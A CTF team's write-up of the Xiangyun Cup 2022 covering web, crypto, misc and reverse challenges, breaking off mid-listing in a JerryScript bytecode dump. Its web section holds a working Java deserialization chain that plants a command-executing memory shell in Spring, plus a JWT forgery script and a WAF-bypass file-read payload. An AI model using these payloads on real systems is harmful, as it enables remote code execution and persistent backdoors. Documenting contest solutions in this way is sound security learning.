祥云杯 2022 By W&M

admin 2024年9月13日22:18:41评论5 views字数 102377阅读341分15秒阅读模式

祥云杯 2022 By W&M

WEB

ezjava

非预期直接CC2。打内存马

import java.io.*;
import java.lang.reflect.Constructor;
import java.lang.reflect.Field;
import java.util.Base64;
import java.util.PriorityQueue;

import com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet;
import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;

import org.apache.commons.collections4.comparators.TransformingComparator;
import org.apache.commons.collections4.functors.InvokerTransformer;
import org.apache.ibatis.javassist.ClassClassPath;
import org.apache.ibatis.javassist.ClassPool;
import org.apache.ibatis.javassist.CtClass;

public class CommonCollection2 {
    public static void main(String[] args) throws Exception {
        Constructor constructor = Class.forName("org.apache.commons.collections4.functors.InvokerTransformer")
                .getDeclaredConstructor(String.class);
        constructor.setAccessible(true);
        InvokerTransformer transformer = (InvokerTransformer) constructor.newInstance("newTransformer");

        ClassPool pool = ClassPool.getDefault();
        pool.insertClassPath(new ClassClassPath(AbstractTranslet.class));


        byte[] bytes = ClassPool.getDefault().get(g.class.getName()).toBytecode();
        byte[][] targetByteCodes = new byte[][]{bytes};
        TemplatesImpl templates = TemplatesImpl.class.newInstance();
        setFieldValue(templates, "_bytecodes", targetByteCodes);
        setFieldValue(templates, "_name", "name");
        setFieldValue(templates, "_class", null);

        TransformingComparator comparator = new TransformingComparator(transformer);
        PriorityQueue queue = new PriorityQueue(1);

        Object[] queue_array = new Object[]{templates, 1};
        Field queue_field = Class.forName("java.util.PriorityQueue").getDeclaredField("queue");
        queue_field.setAccessible(true);
        queue_field.set(queue, queue_array);

        Field size = Class.forName("java.util.PriorityQueue").getDeclaredField("size");
        size.setAccessible(true);
        size.set(queue, 2);

        Field comparator_field = Class.forName("java.util.PriorityQueue").getDeclaredField("comparator");
        comparator_field.setAccessible(true);
        comparator_field.set(queue, comparator);

        try {
   /*         ObjectOutputStream outputStream = new ObjectOutputStream(new FileOutputStream("./cc2"));
            outputStream.writeObject(queue);
            outputStream.close();*/
            ByteArrayOutputStream btout = new ByteArrayOutputStream();
            ObjectOutputStream objOut = new ObjectOutputStream(btout);
            objOut.writeObject(queue);
            byte[] serialized = btout.toByteArray();
            System.out.println(Base64.getEncoder().encodeToString(serialized));
            //ObjectInputStream inputStream = new ObjectInputStream(new FileInputStream("./cc2"));
            //inputStream.readObject();
        } catch (Exception e) {
            e.printStackTrace();
        }

    }

    public static void setFieldValue(final Object obj, final String fieldName, final Object value) throws Exception {
        final Field field = getField(obj.getClass(), fieldName);
        field.set(obj, value);
    }

    public static Field getField(final Class<?> clazz, final String fieldName) {
        Field field = null;
        try {
            field = clazz.getDeclaredField(fieldName);
            field.setAccessible(true);
        } catch (NoSuchFieldException ex) {
            if (clazz.getSuperclass() != null)
                field = getField(clazz.getSuperclass(), fieldName);
        }
        return field;
    }
}
import com.sun.org.apache.xalan.internal.xsltc.DOM;
import com.sun.org.apache.xalan.internal.xsltc.TransletException;
import com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet;
import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl;
import com.sun.org.apache.xml.internal.dtm.DTMAxisIterator;
import com.sun.org.apache.xml.internal.serializer.SerializationHandler;
import org.springframework.util.Base64Utils;
import org.springframework.web.context.WebApplicationContext;
import org.springframework.web.context.request.RequestContextHolder;
import org.springframework.web.servlet.handler.AbstractHandlerMapping;

import java.io.IOException;
import java.lang.reflect.Field;
import java.lang.reflect.InvocationTargetException;
import java.lang.reflect.Method;
import java.util.ArrayList;
public class g extends AbstractTranslet {
    static {
        try {
            printName();
        } catch (NoSuchFieldException e) {
            e.printStackTrace();
        } catch (ClassNotFoundException e) {
            e.printStackTrace();
        } catch (InvocationTargetException e) {
            e.printStackTrace();
        } catch (NoSuchMethodException e) {
            e.printStackTrace();
        } catch (IllegalAccessException e) {
            e.printStackTrace();
        } catch (InstantiationException e) {
            e.printStackTrace();
        } catch (IOException e) {
            e.printStackTrace();
        }
    }
    public static void printName() throws NoSuchMethodException, InvocationTargetException, IllegalAccessException, NoSuchFieldException, ClassNotFoundException, InstantiationException, IOException {
        String className = "GuokeController";
        byte[] bytes = Base64Utils.decodeFromString("yv66vgAAADQAiAoAIABGCABHCwBIAEkLAEoASwgATAgATQoATgBPCgAMAFAIAFEKAAwAUgcAUwcAVAgAVQgAVgoACwBXCABYCABZBwBaCgALAFsKAFwAXQoAEgBeCABfCgASAGAKABIAYQoAEgBiCgASAGMKAGQAZQoAZABmCgBkAGMHAGcHAGgHAGkBAAY8aW5pdD4BAAMoKVYBAARDb2RlAQAPTGluZU51bWJlclRhYmxlAQASTG9jYWxWYXJpYWJsZVRhYmxlAQAEdGhpcwEAEUxHdW9rZUNvbnRyb2xsZXI7AQAJcHJlSGFuZGxlAQBkKExqYXZheC9zZXJ2bGV0L2h0dHAvSHR0cFNlcnZsZXRSZXF1ZXN0O0xqYXZheC9zZXJ2bGV0L2h0dHAvSHR0cFNlcnZsZXRSZXNwb25zZTtMamF2YS9sYW5nL09iamVjdDspWgEAAXABABpMamF2YS9sYW5nL1Byb2Nlc3NCdWlsZGVyOwEABndyaXRlcgEAFUxqYXZhL2lvL1ByaW50V3JpdGVyOwEAAW8BABJMamF2YS9sYW5nL1N0cmluZzsBAAFjAQATTGphdmEvdXRpbC9TY2FubmVyOwEAB3JlcXVlc3QBACdMamF2YXgvc2VydmxldC9odHRwL0h0dHBTZXJ2bGV0UmVxdWVzdDsBAAhyZXNwb25zZQEAKExqYXZheC9zZXJ2bGV0L2h0dHAvSHR0cFNlcnZsZXRSZXNwb25zZTsBAAdoYW5kbGVyAQASTGphdmEvbGFuZy9PYmplY3Q7AQAEY29kZQEADVN0YWNrTWFwVGFibGUHAFQHAGoHAFMHAFoHAGgHAGsHAGwHAG0HAGcBAApFeGNlcHRpb25zAQAKU291cmNlRmlsZQEAFEd1b2tlQ29udHJvbGxlci5qYXZhDAAhACIBAApndW9rZTEyMTM4BwBrDABuAG8HAGwMAHAAcQEAAAEAB29zLm5hbWUHAHIMAHMAbwwAdAB1AQADd2luDAB2AHcBABhqYXZhL2xhbmcvUHJvY2Vzc0J1aWxkZXIBABBqYXZhL2xhbmcvU3RyaW5nAQAHY21kLmV4ZQEAAi9jDAAhAHgBAAcvYmluL3NoAQACLWMBABFqYXZhL3V0aWwvU2Nhbm5lcgwAeQB6BwB7DAB8AH0MACEAfgEAAlxBDAB/AIAMAIEAggwAgwB1DACEACIHAGoMAIUAhgwAhwAiAQATamF2YS9sYW5nL0V4Y2VwdGlvbgEAD0d1b2tlQ29udHJvbGxlcgEAQW9yZy9zcHJpbmdmcmFtZXdvcmsvd2ViL3NlcnZsZXQvaGFuZGxlci9IYW5kbGVySW50ZXJjZXB0b3JBZGFwdGVyAQATamF2YS9pby9QcmludFdyaXRlcgEAJWphdmF4L3NlcnZsZXQvaHR0cC9IdHRwU2VydmxldFJlcXVlc3QBACZqYXZheC9zZXJ2bGV0L2h0dHAvSHR0cFNlcnZsZXRSZXNwb25zZQEAEGphdmEvbGFuZy9PYmplY3QBAAxnZXRQYXJhbWV0ZXIBACYoTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL2xhbmcvU3RyaW5nOwEACWdldFdyaXRlcgEAFygpTGphdmEvaW8vUHJpbnRXcml0ZXI7AQAQamF2YS9sYW5nL1N5c3RlbQEAC2dldFByb3BlcnR5AQALdG9Mb3dlckNhc2UBABQoKUxqYXZhL2xhbmcvU3RyaW5nOwEACGNvbnRhaW5zAQAbKExqYXZhL2xhbmcvQ2hhclNlcXVlbmNlOylaAQAWKFtMamF2YS9sYW5nL1N0cmluZzspVgEABXN0YXJ0AQAVKClMamF2YS9sYW5nL1Byb2Nlc3M7AQARamF2YS9sYW5nL1Byb2Nlc3MBAA5nZXRJbnB1dFN0cmVhbQEAFygpTGphdmEvaW8vSW5wdXRTdHJlYW07AQAYKExqYXZhL2lvL0lucHV0U3RyZWFtOylWAQAMdXNlRGVsaW1pdGVyAQAnKExqYXZhL2xhbmcvU3RyaW5nOylMamF2YS91dGlsL1NjYW5uZXI7AQAHaGFzTmV4dAEAAygpWgEABG5leHQBAAVjbG9zZQEABXdyaXRlAQAVKExqYXZhL2xhbmcvU3RyaW5nOylWAQAFZmx1c2gAIQAfACAAAAAAAAIAAQAhACIAAQAjAAAALwABAAEAAAAFKrcAAbEAAAACACQAAAAGAAEAAAAFACUAAAAMAAEAAAAFACYAJwAAAAEAKAApAAIAIwAAAboABgAJAAAArysSArkAAwIAOgQZBMYAoSy5AAQBADoFEgU6BhIGuAAHtgAIEgm2AAqZACK7AAtZBr0ADFkDEg1TWQQSDlNZBRkEU7cADzoHpwAfuwALWQa9AAxZAxIQU1kEEhFTWQUZBFO3AA86B7sAElkZB7YAE7YAFLcAFRIWtgAXOggZCLYAGJkACxkItgAZpwAFGQY6BhkItgAaGQUZBrYAGxkFtgAcGQW2AB2nAAU6BQOsBKwAAQAPAKYAqQAeAAMAJAAAAEYAEQAAAAcACgAIAA8ACgAXAAsAGwANACsADgBKABAAZgASAHwAEwCQABQAlQAVAJwAFgChABcApgAZAKkAGACrABoArQAcACUAAABmAAoARwADACoAKwAHABcAjwAsAC0ABQAbAIsALgAvAAYAZgBAACoAKwAHAHwAKgAwADEACAAAAK8AJgAnAAAAAACvADIAMwABAAAArwA0ADUAAgAAAK8ANgA3AAMACgClADgALwAEADkAAAA5AAf+AEoHADoHADsHADr8ABsHADz8ACUHAD1BBwA6/wAaAAUHAD4HAD8HAEAHAEEHADoAAQcAQgEBAEMAAAAEAAEAHgABAEQAAAACAEU");
        //控制器的bytecode
        ClassLoader classLoader = Thread.currentThread().getClass().getClassLoader();
        Method method = ClassLoader.class.getDeclaredMethod("defineClass", String.class, byte[].class, int.class, int.class);
        method.setAccessible(true);
        method.invoke(classLoader, className, bytes, 0, bytes.length);
        WebApplicationContext context = (WebApplicationContext) RequestContextHolder.currentRequestAttributes().getAttribute("org.springframework.web.servlet.DispatcherServlet.CONTEXT", 0);
        AbstractHandlerMapping abstractHandlerMapping = (AbstractHandlerMapping) context.getBean("requestMappingHandlerMapping");
        Field field = AbstractHandlerMapping.class.getDeclaredField("adaptedInterceptors");
        field.setAccessible(true);
        ArrayList<Object> adaptedInterceptors = (ArrayList<Object>) field.get(abstractHandlerMapping);
        adaptedInterceptors.add(classLoader.loadClass(className).newInstance());
    }

    @Override
    public void transform(DOM document, SerializationHandler[] handlers) throws TransletException {

    }

    @Override
    public void transform(DOM document, DTMAxisIterator iterator, SerializationHandler handler) throws TransletException {

    }
}

FunWEB

jwt的一个cve

https://github.com/davedoesdev/python-jwt/blob/master/test/vulnerability_vows.py
import json
from json import loads, dumps
import requests
import re
from jwcrypto.common import base64url_decode, base64url_encode
topic=requests.post(url="http://eci-2zegk71yvywhykjxwuv8.cloudeci1.ichunqiu.com/signin",proxies={"http":"http://127.0.0.1:8080"},headers = {'Content-Type': 'application/json'},data=json.dumps({"username":"1","password":"1"}))
res=topic.headers
jwttoken=re.search("token=(.*?);",str(res),re.I|re.M).group(1)
[header, payload, signature] = jwttoken.split('.')
parsed_payload = loads(base64url_decode(payload))
parsed_payload["is_admin"]=1
fake_payload = base64url_encode((dumps(parsed_payload, separators=(',', ':'))))
token=('{"  ' + header + '.' + fake_payload + '.":"","protected":"' + header + '", "payload":"' + payload + '","signature":"' + signature + '"}')
print(token)

替换token

祥云杯 2022 By W&M

祥云杯 2022 By W&M

登录拿到flag

RustWaf

接受POST。然后通过rust-waf。返回值会经过json.parse。然后读文件

readfile随便post一个。

字符串不能包含flag和proc。并且会用rust的json去解析。

如果解析失败直接就返回字符串。然后再经过nodejs的js解析。

根据https://ctftime.org/writeup/35075得到大致的payload

file[href]=a&file[origin]=a&file[protocol]=file:&file[hostname]=&file[pathname]=/app/fl%2561g.txt

大致可以想到。构造一个json字符串。让rust解析失败。返回字符串。再经过nodejs的json正常解析。

最后读取文件

{"href":"a","origin":"a","pathname":"/fl%61g","hostname":"","protocol":"file:","a":1e+5000000000000}

Crypto

tracing

正常的RSA,但是给了gcd的脚本运行过程,根据结果逆向回去得到phi

import re

s, a, b = 0, 1, 0
flag = 0

def solve(cmd):
    global s, a, b, flag
    pos = re.findall("\(\d+\)", cmd)   
    # print(pos)
    if pos:
        pos = int(pos[0][1:-1])
        if pos in [12, 16, 21]:
            a, b = b, a
        elif pos == 34:
            flag += 1
        elif pos == 10 and flag:
            a <<= 1
            flag -= 1
        elif pos == 19 and flag:
            a <<= 1
            flag -= 1
            assert a & 1 == 0
            assert b & 1 == 1
            assert flag == 0
        elif pos == 14 and flag:
            b <<= 1
            flag -= 1
            assert a & 1 == 1
            assert b & 1 == 0
            assert flag == 0
        elif pos == 9:
            a += b
            assert a & 1 == 1
            assert b & 1 == 1
            assert flag == 0
        elif pos in [11, 31, 8, 7, 6, 20, 18, 15, 5]:
            pass
        else:
            print(pos, flag, cmd[:-1])
            print('ERROR')
            exit(0)

f = open("out.out", "r")
data = f.readlines()
f.close()
for i in data[::-1]:
    solve(i)

from Crypto.Util.number import *
c = 64885875317556090558238994066256805052213864161514435285748891561779867972960805879348109302233463726130814478875296026610171472811894585459078460333131491392347346367422276701128380739598873156279173639691126814411752657279838804780550186863637510445720206103962994087507407296814662270605713097055799853102
n = 113793513490894881175568252406666081108916791207947545198428641792768110581083359318482355485724476407204679171578376741972958506284872470096498674038813765700336353715590069074081309886710425934960057225969468061891326946398492194812594219890553185043390915509200930203655022420444027841986189782168065174301
phi, e = a, b
d = inverse(e, phi)
m = pow(c, d, n)
flag = long_to_bytes(m)
print(flag)

fermat

obfuscate写了一大堆看不懂的东西,反正就是类似于在p的基础上加一个数得到q,本地测试之后发现A很小,直接费马分解做掉,x根据威尔逊定力选p-1即可

from Crypto.Util.number import *
from gmpy2 import *

n = 141321067325716426375483506915224930097246865960474155069040176356860707435540270911081589751471783519639996589589495877214497196498978453005154272785048418715013714419926299248566038773669282170912502161620702945933984680880287757862837880474184004082619880793733517191297469980246315623924571332042031367393
c = 81368762831358980348757303940178994718818656679774450300533215016117959412236853310026456227434535301960147956843664862777300751319650636299943068620007067063945453310992828498083556205352025638600643137849563080996797888503027153527315524658003251767187427382796451974118362546507788854349086917112114926883

p = 11887853772894265642834649929578157180848240939084164222334476057487485972806971092902627112665734648016476153593841839977704512156756634066593725142934001
q = 11887853772894265642834649929578157180848240939084164222334476057487485972806971092902627112665734646483980612727952939084061619889139517526028673988305393

x = p - 1
assert pow(114514, x, p) == 1
e = 65537
d = inverse(e, (p-1)*(q-1))
m = pow(c, d, n)
m = m ^ (x**2)
flag = long_to_bytes(m)
print(flag)

MISC

BearParser

虽然是私链,但是每个队伍部署的合约都一样,所以可以拿其他队伍做题的calldata重放到自己队伍部署的合约,蹭车。

  1. 在有其他队伍做出来题目后,爬取区块,找到做出来题目的队伍调用题目合约时传入的calldata,直接拿过来用。

    //https://web3playground.io/
    //连接metamask 去f12执行
    for(let i = 1 ; i < await web3.eth.getBlockNumber() ; i ++){
        let block = await web3.eth.getBlock(i,true);
        let transactions = block.transactions;
        for(let j = 0 ; j < transactions.length; j ++){
            let transaction = transactions[j];
            let events = await web3.eth.getTransactionReceipt(transaction.hash)
            transaction.input && transaction.input != "0x" && events.logs[0] && console.log("" + i + " "+transaction.input);
        }
    }
    190 0x26ad15930000000000000000000000000000000000000000000000000000000000000001000000000000000000000000000000000000000000000000000000000000008061616161616161616161616161616161616161616161616161616161616161616262626262626262626262626262626262626262626262626262626262626262000000000000000000000000000000000000000000000000000000000000004000000000000000000000000000000000000000000000000000000000000000e0000000000000000000000000000000000000000000000000000000001111111100000000000000000000000000000000000000000000000000000000111111110000000000000000000000000000000000000000000000000000000000000060000000000000000000000000000000000000000000000000000000000000000278780000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000060000000000000000000000000000000000000000000000000000000006fb9eccc000000000000000000000000000000000000000000000000000000000000006000000000000000000000000000000000000000000000000000000000000000027878000000000000000000000000000000000000000000000000000000000000
  2. remix ide新建一个空合约 必须有fallback函数 否则remix计算不出gas。编译,不需要部署

    contract xiangyun{
        fallback() external{
        }
    }
  3. 部署页面 At Address添加题目部署的合约 下面Low level interactions直接把爬取到的calldata填进去 执行

    祥云杯 2022 By W&M

把transaction hash填到题目里得到flag。

祥云杯 2022 By W&M

strange_forensics

下载了附件,同时根据题目描述得知,最终的flag由3段flag合起来,那么winhex打开搜了一下flag,发现有flag3的字眼,同时要符合题目描述说的最后带.

祥云杯 2022 By W&M

然后同样在winhex里面搜了一下镜像版本,发现是一个ubuntu18.04的系统:

祥云杯 2022 By W&M

那么就知道是一个linux的内存取证,但是profile需要自己制作。

参考这篇文章:https://www.modb.pro/db/225668 可知我们只需要把内核system.map文件和 module.dwarf文件打包成一个zip文件即可。

我们先下载了一个ubuntu18.04的虚拟机,查看内核发现刚好一模一样:

祥云杯 2022 By W&M

然后先下载了volatility,然后在/volatility/tools/linux 下执行make命令,即可得到module.dwarf(其中应该是会因为环境问题,有一些报错,是缺少部分环境,需自行去安装一下)

然后将上面得到的module.dwarf和system.map放在一起打包为ZIP文件,就是我们需要的profile文件:

祥云杯 2022 By W&M

然后再将制作好的ZIP文件放置volatility/plugins/overlays/linux/目录下,通过volatility --info查看,就可以看到我们配置好的profile文件了:

祥云杯 2022 By W&M

祥云杯 2022 By W&M

然后就是照例用linux_bash看了下bash历史记录和linux_psaux看了下进程和完整的命令行和开始时间:

通过linux_bash可以发现有个bob的用户:

祥云杯 2022 By W&M

通过linux_psaux可以看到最后有个/home/bob/Desktop/secret.zip

祥云杯 2022 By W&M

那么再使用linux_find_file列出这个文件,并尝试恢复文件:

 python2.7 vol.py -f '/home/l1near/Desktop/1.mem'  --profile=Linuxubuntu18_04x64 linux_find_file -F "/home/bob/Desktop/secret.zip"

祥云杯 2022 By W&M

python2.7 vol.py -f '/home/l1near/Desktop/1.mem'  --profile=Linuxubuntu18_04x64 linux_find_file -i 0xffff97ce37a94568 -O /home/l1near/Desktop/secret.zip

提取出文件,发现文件打开报错,直接把数据区inflate也不对,所以怀疑是加密位出现了问题,修改了一下从00改成09,然后用archpr爆破可以得到密码为123456,从而得到flag2:flag2 is _y0u_Ar3_tHe_LIn

同样的操作,去找到并提取了/etc/shadow文件

python2.7 vol.py -f '/home/l1near/Desktop/1.mem'  --profile=Linuxubuntu18_04x64 linux_find_file -F "/etc/shadow"

python2.7 vol.py -f '/home/l1near/Desktop/1.mem'  --profile=Linuxubuntu18_04x64 linux_find_file -i 0xffff97ce7444b448 -O /home/l1near/Desktop/shadow

找到bob用户的密码:

祥云杯 2022 By W&M

cmd5找了下,发现能解出来,即为flag1

最后3段拼一起即为最后的flag

lena

解混淆

得到二维码扫描得到flag

祥云杯 2022 By W&M

RE

engtom

题目给了一个snapshot,通过信息收集知道快照是jerryscript的字节码状态

祥云杯 2022 By W&M

git一份jerryscript项目下来,直接使用是不能dump出字节码的,我们需要在build时候设置一些参数

祥云杯 2022 By W&M

cmake . -DJERRY_SNAPSHOT_EXEC=ON -DJERRY_ERROR_MESSAGES=ON -DJERRY_DEBUGGER=ON       -DJERRY_LINE_INFO=ON  -DJERRY_PARSER_DUMP_BYTE_CODE=ON -DJERRY_REGEXP_DUMP_BYTE_CODE=ON -DJERRY_LOGGING=ON

得到编译好的jerry,带上参数dump字节码

./jerry --show-opcodes --exec-snapshot chall.snapshot

贴上字节码

Byte code dump:

  Maximum stack depth: 38
  Flags: [small_lit_enc]
  Argument range end: 0
  Register range end: 5
  Identifier range end: 30
  Const literal range end: 91
  Literal range end: 101

   0 : CBC_CHECK_VAR ident:5->string(SboxTable)
   2 : CBC_CHECK_VAR ident:6->string(CK)
   4 : CBC_CHECK_VAR ident:7->string(FK)
   6 : CBC_CHECK_VAR ident:8->string(bigxor)
   8 : CBC_CHECK_VAR ident:9->string(leftshift)
  10 : CBC_CHECK_VAR ident:10->string(prefixInteger)
  12 : CBC_CHECK_VAR ident:11->string(sm4Sbox)
  14 : CBC_CHECK_VAR ident:12->string(GET_ULONG_BE)
  16 : CBC_CHECK_VAR ident:13->string(PUT_ULONG_BE)
  18 : CBC_CHECK_VAR ident:14->string(sm4_getkey)
  20 : CBC_CHECK_VAR ident:15->string(encrypt)
  22 : CBC_CHECK_VAR ident:16->string(decrypt_sm4)
  24 : CBC_CHECK_VAR ident:17->string(compare_array)
  26 : CBC_CHECK_VAR ident:18->string(input)
  28 : CBC_CHECK_VAR ident:19->string(num)
  30 : CBC_CHECK_VAR ident:20->string(message)
  32 : CBC_CHECK_VAR ident:21->string(count)
  34 : CBC_CHECK_VAR ident:22->string(pad_len)
  36 : CBC_CREATE_VAR_EVAL ident:5->string(SboxTable)
  38 : CBC_CREATE_VAR_EVAL ident:6->string(CK)
  40 : CBC_CREATE_VAR_EVAL ident:7->string(FK)
  42 : CBC_CREATE_VAR_FUNC_EVAL lit:91 ident:8->string(bigxor)
  45 : CBC_CREATE_VAR_FUNC_EVAL lit:92 ident:9->string(leftshift)
  48 : CBC_CREATE_VAR_FUNC_EVAL lit:93 ident:10->string(prefixInteger)
  51 : CBC_CREATE_VAR_FUNC_EVAL lit:94 ident:11->string(sm4Sbox)
  54 : CBC_CREATE_VAR_FUNC_EVAL lit:95 ident:12->string(GET_ULONG_BE)
  57 : CBC_CREATE_VAR_FUNC_EVAL lit:96 ident:13->string(PUT_ULONG_BE)
  60 : CBC_CREATE_VAR_FUNC_EVAL lit:97 ident:14->string(sm4_getkey)
  63 : CBC_CREATE_VAR_FUNC_EVAL lit:98 ident:15->string(encrypt)
  66 : CBC_CREATE_VAR_FUNC_EVAL lit:99 ident:16->string(decrypt_sm4)
  69 : CBC_CREATE_VAR_FUNC_EVAL lit:100 ident:17->string(compare_array)
  72 : CBC_CREATE_VAR_EVAL ident:18->string(input)
  74 : CBC_CREATE_VAR_EVAL ident:19->string(num)
  76 : CBC_CREATE_VAR_EVAL ident:20->string(message)
  78 : CBC_CREATE_VAR_EVAL ident:21->string(count)
  80 : CBC_CREATE_VAR_EVAL ident:22->string(pad_len)
  82 : CBC_PUSH_LITERAL ident:23->string(Array)
  84 : CBC_NEW0
  85 : CBC_ASSIGN_SET_IDENT ident:5->string(SboxTable)
  87 : CBC_PUSH_LITERAL_PUSH_NUMBER_0 ident:5->string(SboxTable)
  89 : CBC_PUSH_LITERAL_PUSH_NUMBER_POS_BYTE ident:23->string(Array) number:214
  92 : CBC_PUSH_NUMBER_POS_BYTE number:144
  94 : CBC_PUSH_NUMBER_POS_BYTE number:233
  96 : CBC_PUSH_NUMBER_POS_BYTE number:254
  98 : CBC_PUSH_NUMBER_POS_BYTE number:204
 100 : CBC_PUSH_NUMBER_POS_BYTE number:225
 102 : CBC_PUSH_NUMBER_POS_BYTE number:61
 104 : CBC_PUSH_NUMBER_POS_BYTE number:183
 106 : CBC_PUSH_NUMBER_POS_BYTE number:22
 108 : CBC_PUSH_NUMBER_POS_BYTE number:182
 110 : CBC_PUSH_NUMBER_POS_BYTE number:20
 112 : CBC_PUSH_NUMBER_POS_BYTE number:194
 114 : CBC_PUSH_NUMBER_POS_BYTE number:40
 116 : CBC_PUSH_NUMBER_POS_BYTE number:251
 118 : CBC_PUSH_NUMBER_POS_BYTE number:44
 120 : CBC_PUSH_NUMBER_POS_BYTE number:5
 122 : CBC_NEW byte_arg:16
 124 : CBC_ASSIGN_BLOCK
 125 : CBC_PUSH_LITERAL_PUSH_NUMBER_POS_BYTE ident:5->string(SboxTable) number:1
 128 : CBC_PUSH_LITERAL_PUSH_NUMBER_POS_BYTE ident:23->string(Array) number:43
 131 : CBC_PUSH_NUMBER_POS_BYTE number:103
 133 : CBC_PUSH_NUMBER_POS_BYTE number:154
 135 : CBC_PUSH_NUMBER_POS_BYTE number:118
 137 : CBC_PUSH_NUMBER_POS_BYTE number:42
 139 : CBC_PUSH_NUMBER_POS_BYTE number:190
 141 : CBC_PUSH_NUMBER_POS_BYTE number:4
 143 : CBC_PUSH_NUMBER_POS_BYTE number:195
 145 : CBC_PUSH_NUMBER_POS_BYTE number:170
 147 : CBC_PUSH_NUMBER_POS_BYTE number:68
 149 : CBC_PUSH_NUMBER_POS_BYTE number:19
 151 : CBC_PUSH_NUMBER_POS_BYTE number:38
 153 : CBC_PUSH_NUMBER_POS_BYTE number:73
 155 : CBC_PUSH_NUMBER_POS_BYTE number:134
 157 : CBC_PUSH_NUMBER_POS_BYTE number:6
 159 : CBC_PUSH_NUMBER_POS_BYTE number:153
 161 : CBC_NEW byte_arg:16
 163 : CBC_ASSIGN_BLOCK
 164 : CBC_PUSH_LITERAL_PUSH_NUMBER_POS_BYTE ident:5->string(SboxTable) number:2
 167 : CBC_PUSH_LITERAL_PUSH_NUMBER_POS_BYTE ident:23->string(Array) number:156
 170 : CBC_PUSH_NUMBER_POS_BYTE number:66
 172 : CBC_PUSH_NUMBER_POS_BYTE number:80
 174 : CBC_PUSH_NUMBER_POS_BYTE number:244
 176 : CBC_PUSH_NUMBER_POS_BYTE number:145
 178 : CBC_PUSH_NUMBER_POS_BYTE number:239
 180 : CBC_PUSH_NUMBER_POS_BYTE number:152
 182 : CBC_PUSH_NUMBER_POS_BYTE number:122
 184 : CBC_PUSH_NUMBER_POS_BYTE number:51
 186 : CBC_PUSH_NUMBER_POS_BYTE number:84
 188 : CBC_PUSH_NUMBER_POS_BYTE number:11
 190 : CBC_PUSH_NUMBER_POS_BYTE number:67
 192 : CBC_PUSH_NUMBER_POS_BYTE number:237
 194 : CBC_PUSH_NUMBER_POS_BYTE number:207
 196 : CBC_PUSH_NUMBER_POS_BYTE number:172
 198 : CBC_PUSH_NUMBER_POS_BYTE number:98
 200 : CBC_NEW byte_arg:16
 202 : CBC_ASSIGN_BLOCK
 203 : CBC_PUSH_LITERAL_PUSH_NUMBER_POS_BYTE ident:5->string(SboxTable) number:3
 206 : CBC_PUSH_LITERAL_PUSH_NUMBER_POS_BYTE ident:23->string(Array) number:228
 209 : CBC_PUSH_NUMBER_POS_BYTE number:179
 211 : CBC_PUSH_NUMBER_POS_BYTE number:28
 213 : CBC_PUSH_NUMBER_POS_BYTE number:169
 215 : CBC_PUSH_NUMBER_POS_BYTE number:201
 217 : CBC_PUSH_NUMBER_POS_BYTE number:8
 219 : CBC_PUSH_NUMBER_POS_BYTE number:232
 221 : CBC_PUSH_NUMBER_POS_BYTE number:149
 223 : CBC_PUSH_NUMBER_POS_BYTE number:128
 225 : CBC_PUSH_NUMBER_POS_BYTE number:223
 227 : CBC_PUSH_NUMBER_POS_BYTE number:148
 229 : CBC_PUSH_NUMBER_POS_BYTE number:250
 231 : CBC_PUSH_NUMBER_POS_BYTE number:117
 233 : CBC_PUSH_NUMBER_POS_BYTE number:143
 235 : CBC_PUSH_NUMBER_POS_BYTE number:63
 237 : CBC_PUSH_NUMBER_POS_BYTE number:166
 239 : CBC_NEW byte_arg:16
 241 : CBC_ASSIGN_BLOCK
 242 : CBC_PUSH_LITERAL_PUSH_NUMBER_POS_BYTE ident:5->string(SboxTable) number:4
 245 : CBC_PUSH_LITERAL_PUSH_NUMBER_POS_BYTE ident:23->string(Array) number:71
 248 : CBC_PUSH_NUMBER_POS_BYTE number:7
 250 : CBC_PUSH_NUMBER_POS_BYTE number:167
 252 : CBC_PUSH_NUMBER_POS_BYTE number:252
 254 : CBC_PUSH_NUMBER_POS_BYTE number:243
 256 : CBC_PUSH_NUMBER_POS_BYTE number:115
 258 : CBC_PUSH_NUMBER_POS_BYTE number:23
 260 : CBC_PUSH_NUMBER_POS_BYTE number:186
 262 : CBC_PUSH_NUMBER_POS_BYTE number:131
 264 : CBC_PUSH_NUMBER_POS_BYTE number:89
 266 : CBC_PUSH_NUMBER_POS_BYTE number:60
 268 : CBC_PUSH_NUMBER_POS_BYTE number:25
 270 : CBC_PUSH_NUMBER_POS_BYTE number:230
 272 : CBC_PUSH_NUMBER_POS_BYTE number:133
 274 : CBC_PUSH_NUMBER_POS_BYTE number:79
 276 : CBC_PUSH_NUMBER_POS_BYTE number:168
 278 : CBC_NEW byte_arg:16
 280 : CBC_ASSIGN_BLOCK
 281 : CBC_PUSH_LITERAL_PUSH_NUMBER_POS_BYTE ident:5->string(SboxTable) number:5
 284 : CBC_PUSH_LITERAL_PUSH_NUMBER_POS_BYTE ident:23->string(Array) number:104
 287 : CBC_PUSH_NUMBER_POS_BYTE number:107
 289 : CBC_PUSH_NUMBER_POS_BYTE number:129
 291 : CBC_PUSH_NUMBER_POS_BYTE number:178
 293 : CBC_PUSH_NUMBER_POS_BYTE number:113
 295 : CBC_PUSH_NUMBER_POS_BYTE number:100
 297 : CBC_PUSH_NUMBER_POS_BYTE number:218
 299 : CBC_PUSH_NUMBER_POS_BYTE number:139
 301 : CBC_PUSH_NUMBER_POS_BYTE number:248
 303 : CBC_PUSH_NUMBER_POS_BYTE number:235
 305 : CBC_PUSH_NUMBER_POS_BYTE number:15
 307 : CBC_PUSH_NUMBER_POS_BYTE number:75
 309 : CBC_PUSH_NUMBER_POS_BYTE number:112
 311 : CBC_PUSH_NUMBER_POS_BYTE number:86
 313 : CBC_PUSH_NUMBER_POS_BYTE number:157
 315 : CBC_PUSH_NUMBER_POS_BYTE number:53
 317 : CBC_NEW byte_arg:16
 319 : CBC_ASSIGN_BLOCK
 320 : CBC_PUSH_LITERAL_PUSH_NUMBER_POS_BYTE ident:5->string(SboxTable) number:6
 323 : CBC_PUSH_LITERAL_PUSH_NUMBER_POS_BYTE ident:23->string(Array) number:30
 326 : CBC_PUSH_NUMBER_POS_BYTE number:36
 328 : CBC_PUSH_NUMBER_POS_BYTE number:14
